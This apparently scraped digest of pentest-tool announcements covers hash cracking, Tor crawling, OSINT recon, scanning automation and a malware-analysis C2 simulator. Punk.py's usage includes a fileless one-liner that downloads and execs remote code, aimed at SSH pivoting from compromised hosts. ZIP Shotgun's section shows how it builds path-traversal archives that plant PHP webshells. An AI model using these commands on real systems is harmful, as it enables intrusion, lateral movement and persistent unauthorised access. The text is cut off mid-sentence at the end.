Hashie – Crack Hashes In A Blink Of An Eye

Hashie is a multi functional tool written in python to deal with hashes.FeaturesHash cracking.Hash generation.Automatic hash type identification.Supports MD5, SHA1, SHA256, SHA384, SHA512 etc…How to Install and Run in Linux[1] Enter the following command in the terminal to download it.git clone https://github.com/Sameera-Madhushan/Hashie[2] After downloading the program, enter the following command to navigate to the Digger directory and listing the contentscd Hashie && ls[3] Install dependenciespip3 install -r requirements.txt[4] Now run the script with following command.python3 hashie.pyHow to Install and Run in Windows[1] Download and run Python 2.7.x and Python 3.7 setup file from Python.orgIn Install Python 3.7, enable Add Python 3.6 to PATH[2] Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.[3] Afther that, Run Command Propmt and enter this commands:git clone https://github.com/Sameera-Madhushan/Hashiecd Hashiepip3 install -r requirements.txtpython3 hashie.pyDownload Hashie

Link: http://feedproxy.google.com/~r/PentestTools/~3/YG5JSwlXNz0/hashie-crack-hashes-in-blink-of-eye.html

Deep Explorer – Tool Which Purpose Is The Search Of Hidden Services In Tor Network, Using Ahmia Browser And Crawling The Links Obtained

Dependencies pip3 install -r requirements.txtalso you should have Tor installedUsagepython3 deepexplorer.py STRING_TO_SEARCH NUMBER_OF_RESULTS TYPE_OF_CRAWLExamples:python3 deepexplorer.py “legal thing" 40 default legal (will crawl if results obtained in browser do not reach 40, also the script will show links which have "legal" string in html [like intext dork in google])python3 deepexplorer.py "ilegal thing" 30 all dni(will crawl every link obtained in browser [ultil reachs 30], also the script will show links which have "dni" string in html [like intext dork in google])python3 deepexplorer.py "legal thing" 30 none (do not crawl, only obtain links from browser)AboutDeep Explorer is a tool designed to search (any) thing in a few secondsAny idea, failure etc please report to telegram: blueudpresults.txt contains results obtaioned in previus searchTested in ParrotOS and Kali Linux 2.0Type of ErrorsError importing… -> You should try manual pip install packageError connecting to server -> Cant connect to ahmia browser If deep explorer can not execute service …, do it manually, deep explorer checks the tor instance at the beginning so it will skip that partContactName: Eduardo Pérez-MalumbresTelegram: @blueudpTwitter: https://twitter.com/blueudpDownload Deep-Explorer

Link: http://feedproxy.google.com/~r/PentestTools/~3/Uky3GEJ7r8k/deep-explorer-tool-which-purpose-is.html

R3Con1Z3R – A Lightweight Web Information Gathering Tool With An Intuitive Features (OSINT)

R3con1z3r is a lightweight Web information gathering tool with an intuitive features written in python. it provides a powerful environment in which open source intelligence (OSINT) web-based footprinting can be conducted quickly and thoroughly.Footprinting is the first phase of ethical hacking, its the collection of every possible information regarding the target. R3con1z3r is a passive reconnaissance tool with built-in functionalities which includes: HTTP header flag, Traceroute, Whois Footprinting, DNS information, Site on same server, Nmap port scanner, Reverse Target and hyperlinks on a webpage. The tool, after being provided with necessary inputs generates an output in HTML format.ScreenshotsInstallationr3con1z3r supports Python 2 and Python 3.$ git clone https://github.com/abdulgaphy/r3con1z3r.git$ cd r3con1z3r$ pip install -r requirements.txtOptional for Linux users$ sudo chmod +x r3con1z3r.pyModuldesr3con1z3r depends only on the sys and the requests python modules.Python 3: $ pip3 install -r requirements.txtFor Coloring on Windows: pip install win_unicode_console coloramaUsagepython3 r3con1z3r.py [domain.com]ExamplesTo run on all Operating Systems (Linux, Windows, Mac OS X, Android e.t.c) i.e Python 2 environmentpython r3con1z3r.py google.comTo run on python3 environment:python3 r3con1z3r.py facebook.comTo run as executable Unix only./r3con1z3r.py google.comDownload R3Con1Z3R

Link: http://feedproxy.google.com/~r/PentestTools/~3/xpd1vC23W3c/r3con1z3r-lightweight-web-information.html

Punk.Py – Unix SSH Post-Exploitation Tool

unix SSH post-exploitation 1337 toolhow it workspunk.py is a post-exploitation tool meant to help network pivoting from a compromised unix box. It collect usernames, ssh keys and known hosts from a unix system, then it tries to connect via ssh to all the combinations found. punk.py is wrote in order to work on standard python2 installations.examplesstandard execution: ~$ ./punk.pyskip passwd checks and use a custom home path: ~$ ./punk.py –no-passwd –home /home/ldapusers/execute commands with sudo: ~$ ./punk.py –run “sudo sh -c ‘echo iamROOT>/root/hacked.txt’"one-liner fileless ( with –no-passwd parameter ): ~$ python -c "import urllib2;exec(urllib2.urlopen(‘https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py’).read())" –no-passwdTODOimprove private keys hunting including dsa keysRecursionSSH keys with password bruteforceHashed known_hosts bruteforce ( https://blog.rootshell.be/2010/11/03/bruteforcing-ssh-known_hosts-files/ )Download Punk.Py

Link: http://feedproxy.google.com/~r/PentestTools/~3/5T_W704vAXw/punkpy-unix-ssh-post-exploitation-tool.html

ZIP Shotgun – Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog – Compressed File Upload And Command Execution and from OWASP – Test Upload of Malicious FilesThis script will create archive which contains files with “../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.Default webshell is wwwolf’s PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HEREInstallationInstall using Python pip pip install zip-shotgun –upgrade Clone git repository and install git clone https://github.com/jpiechowka/zip-shotgun.gitExecute from root directory of the cloned repository (where setup.py file is located) pip install . –upgrade Usage and optionsUsage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILEOptions: –version Show the version and exit. -c, –directories-count INTEGER Count of how many directories to go back inside the zip file (e.g 3 means that 3 files will be added to the zip: shell.php, ../shell.php and ../../shell.php where shell.php is the name of the shell you provided or randomly generated value [default: 16] -n, –shell-name TEXT Name of the shell inside the generated zip file (e.g shell). If not provided it will be randomly generated. Cannot have whitespaces -f, –shell-file-path PATH A file that contains code for the shell. If this option is not provided wwwolf (https://github.com/WhiteWinterWolf/wwwolf- php-webshell) php shell will be added instead. If name is provided it will be added to the zip with the provided name or if not provided the name will be randomly generated. –compress Enable compression. If this flag is set archive will be compressed using DEFALTE algorithm with compression level of 9. By default there is no compression applied. -h, –help Show this message and exit.ExamplesUsing all default options zip-shotgun archive.zipPart of the script output 12/Dec/2018 Wed 23:13:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj12/Dec/2018 Wed 23:13:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf’s webshell code12/Dec/2018 Wed 23:13:13 +0100 | INFO | Using default file extension for wwwolf’s webshell: php12/Dec/2018 Wed 23:13:13 +0100 | INFO | –compress flag was NOT set. Archive will be uncompressed. Files will be only stored.12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php12/Dec/2018 Wed 23:13:13 +0100 | INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php12/Dec/2018 Wed 23:13:13 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php…12/Dec/2018 Wed 23:13:13 +0100 | INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URLUsing default options and enabling compression for archive file zip-shotgun –compress archive.zipPart of the script output 12/Dec/2018 Wed 23:16:13 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh12/Dec/2018 Wed 23:16:13 +0100 | WARNING | Shell file was not provided. Using default wwwolf’s webshell code12/Dec/2018 Wed 23:16:13 +0100 | INFO | Using default file extension for wwwolf’s webshell: php12/Dec/2018 Wed 23:16:13 +0100 | INFO | –compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9…12/Dec/2018 Wed 23:16:13 +0100 | INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URLUsing default options but changing the number of directories to go back in the archive to 3 zip-shotgun –directories-count 3 archive.zip zip-shotgun -c 3 archive.zipThe script will write 3 files in total to the archivePart of the script output 12/Dec/2018 Wed 23:17:43 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F12/Dec/2018 Wed 23:17:43 +0100 | WARNING | Shell file was not provided. Using default wwwolf’s webshell code12/Dec/2018 Wed 23:17:43 +0100 | INFO | Using default file extension for wwwolf’s webshell: php12/Dec/2018 Wed 23:17:43 +0100 | INFO | –compress flag was NOT set. Archive will be uncompressed. Files will be only stored.12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php12/Dec/2018 Wed 23:17:43 +0100 | INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URLUsing default options but providing shell name inside archive and enabling compressionShell name cannot have whitespaces zip-shotgun –shell-name custom-name –compress archive.zip zip-shotgun -n custom-name –compress archive.zipName for shell files inside the archive will be set to the one provided by the user.Part of the script output 12/Dec/2018 Wed 23:19:12 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:19:12 +0100 | WARNING | Shell file was not provided. Using default wwwolf’s webshell code12/Dec/2018 Wed 23:19:12 +0100 | INFO | Using default file extension for wwwolf’s webshell: php12/Dec/2018 Wed 23:19:12 +0100 | INFO | –compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 912/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php12/Dec/2018 Wed 23:19:12 +0100 | INFO | Writing file to the archive: ../../../custom-name.php…12/Dec/2018 Wed 23:19:12 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URLProvide custom shell file but use random name inside archive. Set directories count to 3 zip-shotgun –directories-count 3 –shell-file-path ./custom-shell.php archive.zip zip-shotgun -c 3 -f ./custom-shell.php archive.zipShell code will be extracted from user provided file. Names inside the archive will be randomly generated.Part of the script output 12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:21:37 +0100 | WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf12/Dec/2018 Wed 23:21:37 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive12/Dec/2018 Wed 23:21:37 +0100 | INFO | Getting file extension from provided shell file for reuse: php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | –compress flag was NOT set. Archive will be uncompressed. Files will be only stored.12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php12/Dec/2018 Wed 23:21:37 +0100 | INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URLProvide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression zip-shotgun –directories-count 3 –shell-name custom-name –shell-file-path ./custom-shell.php –compress archive.zip zip-shotgun -c 3 -n custom-name -f ./custom-shell.php –compress archive.zipShell code will be extracted from user provided file. Names inside the archive will be set to user provided name.Part of the script output 12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip12/Dec/2018 Wed 23:25:19 +0100 | INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive12/Dec/2018 Wed 23:25:19 +0100 | INFO | Getting file extension from provided shell file for reuse: php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | –compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 912/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Writing file to the archive: ../../custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php12/Dec/2018 Wed 23:25:19 +0100 | INFO | Finished. Try to access shell using custom-name.php in the URLDownload Zip-Shotgun

Link: http://feedproxy.google.com/~r/PentestTools/~3/zgU6TcdSSH8/zip-shotgun-utility-script-to-test-zip.html

imaginaryC2 – Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware

author: Felix Weyne (website) (Twitter)Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware.Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis.Replay packet capturesImaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.Technical detailsrequirements: Imaginary C2 requires Python 2.7 and Windows.modules: Currently, Imaginary C2 contains three modules and two configuration files: Filename Function 1. imaginary_c2.py Hosts python’s simple HTTP server. Main module. 2. redirect_to_imaginary_c2.py Alters Windows’ host file and Windows’ (IP) Routing Table. 3. unpack_fiddler_archive.py & unpack_pcap.py Extracts HTTP responses from packet captures. Adds corresponding HTTP request domains and URLs to the configuration files. 4. redirect_config.txt Contains domains and IPs which needs to be redirected to localhost (to the python HTTP server). 5. requests_config.txt Contains URL path definitions with the corresponding data sources. request definitions: Each (HTTP) request defined in the request configuration consists of two parameters:Parameter 1: HTTP request URL path (a.k.a. urlType) Value Meaning fixed Define the URL path as a literal string regex Define a regex pattern to be matched on the URL path Parameter 2: HTTP response source (a.k.a. sourceType) Value Meaning data Imaginary C2 will respond with the contents of a file on disk python Imaginary C2 will run a python script. The output of the python script defines the HTTP response. Demo use case: Simulating TrickBot serversImaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot’s web injection servers.How it works:Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.One of TrickBot’s plugins is called injectdll, a plugin which is responsible for TrickBot’s webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim.Imaginary C2 in action:The below video shows the TrickBot downloader running inside svchost.exe and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser’s saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: “Default imaginary C2 server response" (full video).Download imaginaryC2

Link: http://feedproxy.google.com/~r/PentestTools/~3/V0gucmHB1Ec/imaginaryc2-tool-which-aims-to-help-in.html

Celerystalk – An Asynchronous Enumeration and Vulnerability Scanner

celerystalk helps you automate your network scanning/enumeration process with asynchronous jobs (aka tasks) while retaining full control of which tools you want to run.Configurable – Some common tools are in the default config, but you can add any tool you wantService Aware – Uses nmap/nessus service names rather than port numbers to decide which tools to runScalable – Designed for scanning multiple hosts, but works well for scanning one host at a timeVirtualHosts – Supports subdomain recon and virtualhost scanningJob Control – Supports canceling, pausing, and resuming of tasks, inspired by Burp scannerScreenshots Automatically takes screenshots of every url identified via brute force (gobuster) and spidering (Photon)Install/SetupSupported Operating Systems: KaliSupported Python Version: 2.xYou must install and run celerystalk as root# git clone https://github.com/sethsec/celerystalk.git# cd celerystalk/setup# ./install.sh# cd ..# ./celerystalk -hYou must install and run celerystalk as rootUsing celerystalk – The basics[CTF/HackTheBox mode] – How to scan a host by IP# nmap 10.10.10.10 -Pn -p- -sV -oX tenten.xml # Run nmap# ./celerystalk workspace create -o /htb # Create default workspace and set output dir# ./celerystalk import -f tenten.xml # Import scan # ./celerystalk db services # If you want to see what services were loaded# ./celerystalk scan # Run all enabled commands# ./celerystalk query watch (then Ctrl+c) # Watch scans as move from pending > running > complete# ./celerystalk report # Generate report# firefox /htb/celerystalkReports/Workspace-Report[Default.html] & # View report [Vulnerability Assessment Mode] – How to scan a list of in-scope hosts/networks and any subdomains that resolve to any of the in-scope IPs# nmap -iL client-inscope-list.txt -Pn -p- -sV -oX client.xml # Run nmap# ./celerystalk workspace create -o /assessments/client # Create default workspace and set output dir# ./celerystalk import -f client.xml -S scope.txt # Import scan and scope files# ./celerystalk subdomains -d client.com,client.net # Find subdomains and determine if in scope# ./celerystalk scan # Run all enabled commands# ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish# ./celerystalk report # Generate report# firefox /celerystalkReports/Workspace-Report[Default].html &# View report [URL Mode] – How to scan a a URL (Use this mode to scan sub-directories found during first wave of scans).# ./celerystalk workspace create -o /assessments/client # Create default workspace and set output dir# ./celerystalk scan -u http://10.10.10.10/secret_folder/ # Run all enabled commands# ./celerystalk query watch (then Ctrl+c) # Wait for scans to finish# ./celerystalk report # Generate report# firefox <path>/celerystalkReports/Workspace-Report[Default].html &# View report Using celerystalk – Some more detail Configure which tools you’d like celerystalk to execute: The install script drops a config.ini file in the celerystalk folder. The config.ini script is broken up into three sections: Service Mapping – The first section normalizes Nmap & Nessus service names for celerystalk (this idea was created by @codingo_ in Reconnoitre AFAIK). [nmap-service-names]http = http,http-alt,http-proxy,www,http?https = ssl/http,https,ssl/http-alt,ssl/http?ftp = ftp,ftp?mysql = mysqldns = dns,domain,domainDomain Recon Tools – The second section defines the tools you’d like to use for subdomain discovery (an optional feature): [domain-recon]amass : /opt/amass/amass -d [DOMAIN]sublist3r : python /opt/Sublist3r/sublist3r.py -d [DOMAIN]Service Configuration – The rest of the confi.ini sections define which commands you want celerystalk to run for each identified service (i.e., http, https, ssh). Disable any command by commenting it out with a ; or a #.Add your own commands using [TARGET],[PORT], and [OUTPUT] placeholders.Here is an example: [http]whatweb : whatweb http://[TARGET]:[PORT] -a3 –colour=never > [OUTPUT].txtcewl : cewl http://[TARGET]:[PORT]/ -m 6 -w [OUTPUT].txtcurl_robots : curl http://[TARGET]:[PORT]/robots.txt –user-agent ‘Googlebot/2.1 (+http://www.google.com/bot.html)’ –connect-timeout 30 –max-time 180 > [OUTPUT].txtnmap_http_vuln : nmap -sC -sV -Pn -v -p [PORT] –script=http-vuln* [TARGET] -d -oN [OUTPUT].txt -oX [OUTPUT].xml –host-timeout 120m –script-timeout 20mnikto : nikto -h http://[TARGET] -p [PORT] &> [OUTPUT].txtgobuster-common : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -s ‘200,204,301,302,307,403,500’ -e -n -q > [OUTPUT].txtphoton : python /opt/Photon/photon.py -u http://[TARGET]:[PORT] -o [OUTPUT];gobuster_2.3-medium : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s ‘200,204,301,307,403,500’ -e -n -q > [OUTPUT].txt Run Nmap or Nessus: Nmap: Run nmap against your target(s). Required: enable version detection (-sV) and output to XML (-oX filename.xml). All other nmap options are up to you. Here are some examples: nmap target(s) -Pn -p- -sV -oX filename.xml nmap -iL target_list.txt -Pn -sV -oX filename.xmlNessus: Run nessus against your target(s) and export results as a .nessus file Create worksapce: Option Description no options Prints current workspace create Creates new workspace -w Define new workspace name -o Define output directory assigned to workspace Create default workspace ./celerystalk workspace create -o /assessments/client Create named workspace ./celerystalk workspace create -o /assessments/client -w client Switch to another worksapce ./celerystalk workspace client Import Data: Import data into celerystalk Option Description -f scan.xml Nmap/Nessus xmlAdds all IP addresses from this file to hosts table and marks them all in scope to be scanned.Adds all ports and service types to services table. -S scope.txt Scope fileShow file differences that haven’t been staged -D subdomains.txt (sub)Domains filecelerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned. Import Nmap XML file: ./celerystalk import -f /assessments/nmap.xml Import Nessus file: ./celerystalk import -f /assessments/scan.nessus Import list of Domains: ./celerystalk import -D <file>Import list of IPs/Ranges: ./celerystalk import -S <file>Specify workspace: ./celerystalk import -f <file> Import multiple files: ./celerystalk import -f nmap.xml -S scope.txt -D domains.txt Find Subdomains (Optional): celerystalk will perform subdomain recon using the tools specified in the config.ini. Option Description -d domain1,domain2,etc Run Amass, Sublist3r, etc. and store domains in DBAfter running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned. Find subdomains: celerystalk subdomains -d domain1.com,domain2.com Launch Scan: I recommend using the import command first and running scan with no options, however you do have the option to do it all at once (import and scan) by using the flags below. celerystalk will submit tasks to celery which asynchronously executes them and logs output to your output directory. Option Description no options Scan all in scope hostsReads DB and scans every in scope IP and subdomain.Launches all enabled tools for IPs, but only http/http specific tools against virtualhosts -t ip,vhost,cidr Scan specific target(s) from DB or scan fileScan a subset of the in scope IPs and/or subdomains. -s SimulationSends all of the tasks to celery, but all commands are executed with a # before them rendering them inert. Use these only if you want to skip the import phase and import/scan all at once -f scan.xml Import and process Nmap/Nessus xml before scanAdds all IP addresses from this file to hosts table and marks them all in scope to be scanned.Adds all ports and service types to services table. -S scope.txt Import and process scope file before scanShow file differences that haven’t been staged. -D subdomains.txt Import and process (sub)domains file before scan celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned. -d domain1,domain2,etc Find Subdomains and scan in scope hostsAfter running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for IP in the DB. If there is a match, the domain is marked as in scope and will be scanned. Scan imported hosts/subdomains Scan all in scope hosts: ./celerystalk scan Scan subset of DB hosts: ./celerystalk scan -t 10.0.0.1,10.0.0.3 ./celerystalk scan -t 10.0.0.100-200 ./celerystalk scan -t 10.0.0.0/24 ./celerystalk scan -t sub.domain.comSimulation mode: ./celerystalk scan -sImport and Scan Start from Nmap XML file: ./celerystalk scan -f /pentest/nmap.xml -o /pentestStart from Nessus file: ./celerystalk scan -f /pentest/scan.nessus -o /pentestScan all in scope vhosts: ./celerystalk scan -f <file> -o /pentest -d domain1.com,domain2.comScan subset hosts in XML: ./celerystalk scan -f <file> -o /pentest -t 10.0.0.1,10.0.0.3 ./celerystalk scan -f <file> -o /pentest -t 10.0.0.100-200 ./celerystalk scan -f <file> -o /pentest -t 10.0.0.0/24Simulation mode: ./celerystalk scan -f <file> -o /pentest -s Rescan: Use this command to rescan an already scanned host. Option Description no option For each in scope host in the DB, celerystalk will ask if if you want to rescan it -t ip,vhost,cidr Scan a subset of the in scope IPs and/or subdomains. Rescan all hosts: ./celerystalk rescanRescan some hosts ./celerystalk rescan-t 1.2.3.4,sub.domain.com Simulation mode: ./celerystalk rescan -s Query Status: Asynchronously check the status of the tasks queue as frequently as you like. The watch mode actually executes the linux watch command so you don’t fill up your entire terminal buffer. Option Description no options Shows all tasks in the defualt workspace watch Sends command to the unix watch command which will let you get an updated status every 2 seconds brief Limit of 5 results per status (pending/running/completed/cancelled/paused) summary Shows only a banner with numbers and not the tasks themselves Query Tasks: ./celerystalk query ./celerystalk query watch ./celerystalk query brief ./celerystalk query summary ./celerystalk query summary watch Cancel/Pause/Resume Tasks: Cancel/Pause/Resume any task(s) that are currently running or in the queue. Option Description cancel Canceling a running task will send a kill -TERMCanceling a queued task* will make celery ignore it (uses celery’s revoke).Canceling all tasks* will kill running tasks and revoke all queued tasks. pause Pausing a single task uses kill -STOP to suspend the process.Pausing all tasks* attemps to kill -STOP all running tasks, but it is a little wonky and you mind need to run it a few times. It is possible a job completed before it was able to be paused, which means you will have a worker that is still accepting new jobs. resume Resuming tasks* sends a kill -CONT which allows the process to start up again where it left off. Cancel/Pause/Resume Tasks: ./celerystalk <verb> 5,6,10-20 #Cancel/Pause/Resume tasks 5, 6, and 10-20 from current workspace ./celerystalk <verb> all #Cancel/Pause/Resume all tasks from current workspaces Run Report: Run a report which combines all of the tool output into an html file and a txt file. Run this as often as you like. Each time you run the report it overwrites the previous report. Create Report: ./celerystalk report #Create a report for all scanneed hosts in current workspaceScreenshot: Access the DB: List the workspaces, hosts, services, or paths stored in the celerystalk database Option Description workspaces Show all known workspaces and the output directory associated with each workspace services Show all known open ports and service types by IP hosts Show all hosts (IP addresses and subdomains/vhosts) and whether they are in scope and whether they have been submitted for scanning paths Show all paths that have been identified by vhost -w workspace Specify a non-default workspace Show workspaces: ./celeryststalk db workspacesShow services: ./celeryststalk db services Show hosts: ./celeryststalk db hostsShow paths: ./celeryststalk db paths Export DB: Export each table of the DB to a csv file Option Description no options Export the services, hosts, and paths table from the default database -w workspace Specify a non-default workspace Export current DB: ./celerystalk db exportExport another DB: ./celerystalk db export -w testUsageUsage: celerystalk workspace create -o <output_dir> [-w workspace_name] celerystalk workspace [<workspace_name>] celerystalk import [-f <nmap_file>] [-S scope_file] [-D subdomains_file] [-u <url>] celerystalk subdomains -d <domains> [-s] celerystalk scan [-f <nmap_file>] [-t <targets>] [-d <domains>] [-S scope_file] [-D subdomains_file] [-s] celerystalk scan -u <url> [-s] celerystalk rescan [-t <targets>] [-s] celerystalk query ([full] | [summary] | [brief]) [watch] celerystalk query [watch] ([full] | [summary] | [brief]) celerystalk report celerystalk cancel ([all]|[<task_ids>]) celerystalk pause ([all]|[<task_ids>]) celerystalk resume ([all]|[<task_ids>]) celerystalk db ([workspaces] | [services] | [hosts] | [vhosts] | [paths]) celerystalk db export celerystalk shutdown celerystalk interactive celerystalk (help | -h | –help)Options: -h –help Show this screen -v –version Show version -f <nmap_file> Nmap xml import file -o <output_dir> Output directory -S <scope_file> Scope import file -D <subdomains_file> Subdomains import file -t <targets> Target(s): IP, IP Range, CIDR -u <url> URL to parse and scan with all configured tools -w <workspace> Workspace -d –domains Domains to scan for vhosts -s –simulation Simulation mode. Submit tasks comment out all commandsExamples: Workspace Create default workspace celerystalk workspace create -o /assessments/client Create named workspace celerystalk workspace create -o /assessments/client -w client Switch to another worksapce celerystalk workspace client2 Import Import Nmap XML file: celerystalk import -f /assessments/nmap.xml Import Nessus file: celerystalk import -f /assessments/scan.nessus Import list of Domains: celerystalk import -D <file> Import list of IPs/Ranges: celerystalk import -S <file> Import multiple files: celerystalk import -f nmap.xml -S scope.txt -D domains.txt Subdomain Recon Find subdomains: celerystalk subdomains -d domain1.com,domain2.com Scan Scan all in scope hosts: celerystalk scan Scan subset of DB hosts: celerystalk scan -t 10.0.0.1,10.0.0.3 celerystalk scan -t 10.0.0.100-200 celerystalk scan -t 10.0.0.0/24 celerystalk scan -t sub.domain.com Simulation mode: celerystalk scan -s Import and Scan Start from Nmap XML file: celerystalk scan -f /pentest/nmap.xml Start from Nessus file: celerystalk scan -f /pentest/scan.nessus Scan subset hosts in XML: celerystalk scan -f <file> -t 10.0.0.1,10.0.0.3 celerystalk scan -f <file> -t 10.0.0.100-200 celerystalk scan 